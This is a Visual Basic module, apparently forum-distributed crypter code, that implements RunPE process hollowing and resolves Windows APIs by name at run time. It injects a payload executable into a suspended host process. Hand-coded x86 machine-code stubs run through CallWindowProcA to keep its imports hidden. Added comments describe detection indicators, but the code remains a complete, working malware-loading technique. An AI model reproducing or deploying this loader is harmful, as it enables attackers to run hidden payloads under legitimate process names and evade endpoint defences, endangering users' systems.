Descripción: RunPe + CallApiByName
Autor: Jhonjhon_123 - [J.J.G.P]
Option Explicit
' ****************************************************************************************************************************** '
'
' --- Autor: Jhonjhon_123 (Jhon Jairo Pro Developer)
' --- Descripción: RunPe + CallApiByName
' --- Distribución: Libre
' --- Términos de uso:
' --- Prohibida su comercialización.
' --- No debe eliminar los créditos.
'
' --- Funciones:
' --- IniciarDDLL()
' - Inicializa la configuración
'
' --- Public Sub ExecuteBytes(sName As String, bBytes() As Byte)
' - RunPE
' * sName: Ruta al exe
' * bBytes: Bytes a ejecutar
'
' ****************************************************************************************************************************** '
' The only Win32 functions this module imports statically. Every other API it
' touches (CreateProcessW, NtUnmapViewOfSection, WriteProcessMemory, ...) is
' resolved at run time by name in Call_ below, so the import table of a binary
' built from this code shows just these four entries. Analysts should look for
' LoadLibraryA/GetProcAddress paired with API-name string literals instead of
' relying on the import table.
Declare Sub RtlMoveMemory Lib "kernel32" (Dest As Any, Src As Any, ByVal L As Long)
' Used below as a way to transfer control into byte arrays (see Call_ and MoveMemory).
Declare Function CallWindowProcA Lib "user32" (ByVal addr As Long, ByVal p1 As Long, ByVal p2 As Long, ByVal p3 As Long, ByVal p4 As Long) As Long
Declare Function GetProcAddress Lib "kernel32" (ByVal hModule As Long, ByVal lpProcName As String) As Long
Declare Function LoadLibraryA Lib "kernel32" (ByVal lpLibFileName As String) As Long
' Module-level 37-byte buffer filled by IniciarDDLL and executed by MoveMemory.
Dim bMoveMem(36) As Byte
' Fill bMoveMem with the byte table that MoveMemory later executes.
' Must be called once before ExecuteBytes; until then bMoveMem is all zeros.
' NOTE(review): the sequence looks like a small x86 copy routine (the
' &HF3 &HA5 / &HF3 &HA4 "rep movs" pattern) ending in a stdcall return
' (&HC2 &H10 &H0); confirm with a disassembler before relying on that reading.
' Detection note: a constant byte table whose address is later passed to
' CallWindowProcA as a code pointer is a strong static indicator of embedded
' machine code.
Public Sub IniciarDDLL()
Dim vTMP As Variant ' current literal from the Array() below
Dim D As Long ' next index in bMoveMem to fill (starts at 0)
' Walk the literal table; CByte narrows each Variant to a byte.
For Each vTMP In Array(&H55, &H8B, &HEC, &H56, &H57, &H60, &HFC, &H8B, &H75, &HC, &H8B, &H7D, &H8, &H8B, &H4D, &H10, &HC1, &HE9, &H2, &HF3, &HA5, &H8B, &H4D, &H10, &H83, &HE1, &H3, &HF3, &HA4, &H61, &H5F, &H5E, &HC9, &HC2, &H10, &H0, &H20)
bMoveMem(D) = CByte(vTMP): D = D + 1
Next
End Sub
'By Cobein
' Resolve sLib!sMod at run time and call it with Params as stdcall Long
' arguments, returning the callee's result. This is the "CallApiByName" half
' of the module: no Declare statement for the target ever exists.
'   sLib:   DLL name handed to LoadLibraryA (e.g. "kernel32")
'   sMod:   export name handed to GetProcAddress
'   Params: zero or more values, each coerced with CLng and pushed right-to-left
' Returns 0 when the library or export cannot be resolved; because of On Error
' Resume Next it also returns 0 after any swallowed run-time error (e.g. a
' Param that CLng cannot convert).
' Mechanism: a short stub is assembled into bvASM and entered through
' CallWindowProcA, which calls it with four dummy Longs on the stack.
' NOTE(review): the constants appear to be x86 opcodes (&H58/&H59 pop,
' &H50 push eax, &H68 push imm32, &HE8 call rel32, &HC3 ret): the four
' CallWindowProcA arguments are discarded, Params are pushed, the target is
' called. Not verified with a disassembler here.
' Detection note: API names arriving as plain strings through
' LoadLibraryA/GetProcAddress, plus a writable byte buffer handed to
' CallWindowProcA as a code pointer, is the pattern to flag when a sample's
' import table looks nearly empty.
Function Call_(ByVal sLib As String, ByVal sMod As String, ParamArray Params()) As Long
On Error Resume Next ' every error below is swallowed; the function then yields 0
Dim lPtr As Long ' write cursor into bvASM
Dim bvASM(&HEC00& - 1) As Byte ' stub buffer (about 59 KB of stack, far more than the stub needs)
Dim i As Long
Dim lMod As Long ' address of the resolved export
lMod = GetProcAddress(LoadLibraryA(sLib), sMod) ' dynamic resolution by name
If lMod = 0 Then Exit Function ' unresolved library or export
lPtr = VarPtr(bvASM(0))
RtlMoveMemory ByVal lPtr, &H59595958, &H4: lPtr = lPtr + 4 ' stored little-endian: 58 59 59 59
RtlMoveMemory ByVal lPtr, &H5059, &H2: lPtr = lPtr + 2 ' stored little-endian: 59 50
' Right-to-left so Params(0) ends up on top of the stack (stdcall order).
' An empty ParamArray has UBound -1, so this loop is simply skipped.
For i = UBound(Params) To 0 Step -1
RtlMoveMemory ByVal lPtr, &H68, &H1: lPtr = lPtr + 1
RtlMoveMemory ByVal lPtr, CLng(Params(i)), &H4: lPtr = lPtr + 4 ' 4-byte immediate; CLng may raise (swallowed)
Next
RtlMoveMemory ByVal lPtr, &HE8, &H1: lPtr = lPtr + 1
RtlMoveMemory ByVal lPtr, lMod - lPtr - 4, &H4: lPtr = lPtr + 4 ' displacement measured from the byte after this 4-byte operand
RtlMoveMemory ByVal lPtr, &HC3, &H1: lPtr = lPtr + 1
Call_ = CallWindowProcA(VarPtr(bvASM(0)), 0, 0, 0, 0) ' run the stub straight out of the data buffer
End Function
' By Strike Bot
' Copy cBytes bytes from lpSource to lpDestino by executing the stub stored in
' bMoveMem through CallWindowProcA (the trailing 0 is an unused fourth Long).
' IniciarDDLL must have run first; otherwise bMoveMem is still all zeros.
' This duplicates what the statically declared RtlMoveMemory already offers,
' presumably so the copies do not appear as calls to an imported function; for
' an analyst they instead show up as CallWindowProcA invocations whose target
' address lies inside a data buffer.
Public Sub MoveMemory(ByVal lpDestino As Long, ByVal lpSource As Long, ByVal cBytes As Long)
Call CallWindowProcA(VarPtr(bMoveMem(0)), lpDestino, lpSource, cBytes, 0)
End Sub
' By Jhonjhon_123
' RunPE / process hollowing: start sName suspended, replace its mapped image
' with the PE held in bBytes, and resume it so the payload runs under the
' host's process name and path. Only 32-bit images are handled: the
' IMAGE_NT_HEADERS32 field offsets and the x86 CONTEXT layout are hard-coded.
'   sName:  path of the host executable; passed to CreateProcessW as the
'           command line (lpApplicationName is 0)
'   bBytes: complete PE file image (headers followed by raw section data)
' Requires IniciarDDLL to have been called first (MoveMemory needs its stub).
' Every API return value is discarded and the sub runs under On Error Resume
' Next, so it always reaches the end whether or not any step succeeded; the
' process and thread handles are never closed.
' Detection note: the chain CreateProcess(CREATE_SUSPENDED) ->
' NtUnmapViewOfSection -> VirtualAllocEx(PAGE_EXECUTE_READWRITE) ->
' WriteProcessMemory -> SetThreadContext -> ResumeThread is the canonical
' hollowing sequence that endpoint telemetry keys on; in memory, the
' resulting process's image region is no longer backed by the file on disk.
Public Sub ExecuteBytes(sName As String, bBytes() As Byte)
On Error Resume Next ' continue silently past any run-time error (e.g. bBytes shorter than the offsets read below)
Dim bIdh(63) As Byte ' IMAGE_DOS_HEADER (64 bytes)
Dim bInh(247) As Byte ' IMAGE_NT_HEADERS32 (248 bytes: signature + file header + 224-byte optional header)
Dim bIsh(39) As Byte ' IMAGE_SECTION_HEADER (40 bytes)
Dim bPi(15) As Byte ' PROCESS_INFORMATION (16 bytes)
Dim bSi(67) As Byte ' STARTUPINFO (68 bytes)
Dim bCtx(203) As Byte ' CONTEXT, x86 layout (204 bytes)
Dim e_lfanew As Long ' file offset of the NT headers inside bBytes
Dim ImageBase As Long ' payload's preferred base; also used as the target address in the host
Dim hProcess As Long
Dim hThread As Long
Dim SizeOfImage As Long
Dim SizeOfHeaders As Long
Dim AddressOfEntryPoint As Long ' RVA of the payload entry point
Dim NumberOfSections As Integer
Dim VirtualAddress As Long ' current section's RVA
Dim PointerToRawData As Long ' current section's file offset in bBytes
Dim SizeOfRawData As Long
Dim Ebx As Long ' host thread's EBX read back from CONTEXT
Dim Eax As Long ' declared but never used
Dim lTemp As Long ' scratch Long for writing values into the byte structures
Dim D As Long ' section index
lTemp = 68
MoveMemory VarPtr(bSi(0)), VarPtr(lTemp), 4& ' STARTUPINFO.cb = sizeof(STARTUPINFO)
lTemp = &H10007
MoveMemory VarPtr(bCtx(0)), VarPtr(lTemp), 4& ' CONTEXT.ContextFlags = CONTEXT_FULL (x86)
' --- Parse the PE headers out of bBytes ---
MoveMemory VarPtr(bIdh(0)), VarPtr(bBytes(0)), 64& ' DOS header
MoveMemory VarPtr(e_lfanew), VarPtr(bIdh(60)), 4& ' IMAGE_DOS_HEADER.e_lfanew
MoveMemory VarPtr(bInh(0)), VarPtr(bBytes(e_lfanew)), 248& ' NT headers; e_lfanew is not validated against the size of bBytes
MoveMemory VarPtr(ImageBase), VarPtr(bInh(52)), 4& ' OptionalHeader.ImageBase
MoveMemory VarPtr(SizeOfImage), VarPtr(bInh(80)), 4& ' OptionalHeader.SizeOfImage
MoveMemory VarPtr(SizeOfHeaders), VarPtr(bInh(84)), 4& ' OptionalHeader.SizeOfHeaders
MoveMemory VarPtr(AddressOfEntryPoint), VarPtr(bInh(40)), 4& ' OptionalHeader.AddressOfEntryPoint
MoveMemory VarPtr(NumberOfSections), VarPtr(bInh(6)), 2& ' FileHeader.NumberOfSections
' --- Create the host process suspended (&H4 = CREATE_SUSPENDED) ---
Call Call_("kernel32", "CreateProcessW", 0, StrPtr(sName), 0, 0, 0, &H4, 0, 0, VarPtr(bSi(0)), VarPtr(bPi(0)))
MoveMemory VarPtr(hProcess), VarPtr(bPi(0)), 4& ' PROCESS_INFORMATION.hProcess
MoveMemory VarPtr(hThread), VarPtr(bPi(4)), 4& ' PROCESS_INFORMATION.hThread
' --- Replace the host's image at the payload's preferred base ---
Call Call_("ntdll", "NtUnmapViewOfSection", hProcess, ImageBase) ' drop whatever the host had mapped at ImageBase
Call Call_("kernel32", "VirtualAllocEx", hProcess, ImageBase, SizeOfImage, &H1000& Or &H2000&, &H40) ' MEM_COMMIT Or MEM_RESERVE, PAGE_EXECUTE_READWRITE: one RWX region for the whole image
Call Call_("kernel32", "WriteProcessMemory", hProcess, ImageBase, VarPtr(bBytes(0)), SizeOfHeaders, 0) ' headers first
For D = 0 To NumberOfSections - 1
MoveMemory VarPtr(bIsh(0)), VarPtr(bBytes(e_lfanew + 248& + 40& * D)), 40& ' section header D; assumes the table starts right after the 248-byte NT headers
MoveMemory VarPtr(VirtualAddress), VarPtr(bIsh(12)), 4& ' IMAGE_SECTION_HEADER.VirtualAddress
MoveMemory VarPtr(SizeOfRawData), VarPtr(bIsh(16)), 4& ' IMAGE_SECTION_HEADER.SizeOfRawData
MoveMemory VarPtr(PointerToRawData), VarPtr(bIsh(20)), 4& ' IMAGE_SECTION_HEADER.PointerToRawData
Call Call_("kernel32", "WriteProcessMemory", hProcess, ImageBase + VirtualAddress, VarPtr(bBytes(PointerToRawData)), SizeOfRawData, 0) ' raw section bytes to their RVA
Next
' --- Point the suspended main thread at the payload ---
Call Call_("kernel32", "GetThreadContext", hThread, VarPtr(bCtx(0)))
MoveMemory VarPtr(Ebx), VarPtr(bCtx(164)), 4& ' CONTEXT.Ebx (x86 offset 164)
Call Call_("kernel32", "WriteProcessMemory", hProcess, Ebx + 8&, VarPtr(ImageBase), 4&, 0) ' NOTE(review): in the usual RunPE technique EBX of the initial thread points at the PEB, making this PEB.ImageBaseAddress (offset 8); confirm
lTemp = ImageBase + AddressOfEntryPoint
MoveMemory VarPtr(bCtx(176)), VarPtr(lTemp), 4& ' CONTEXT.Eax (x86 offset 176); the thread start routine is expected to transfer to EAX, so this becomes the entry point - confirm
Call Call_("kernel32", "SetThreadContext", hThread, VarPtr(bCtx(0)))
Call Call_("kernel32", "ResumeThread", hThread) ' payload starts running inside the host process
End Sub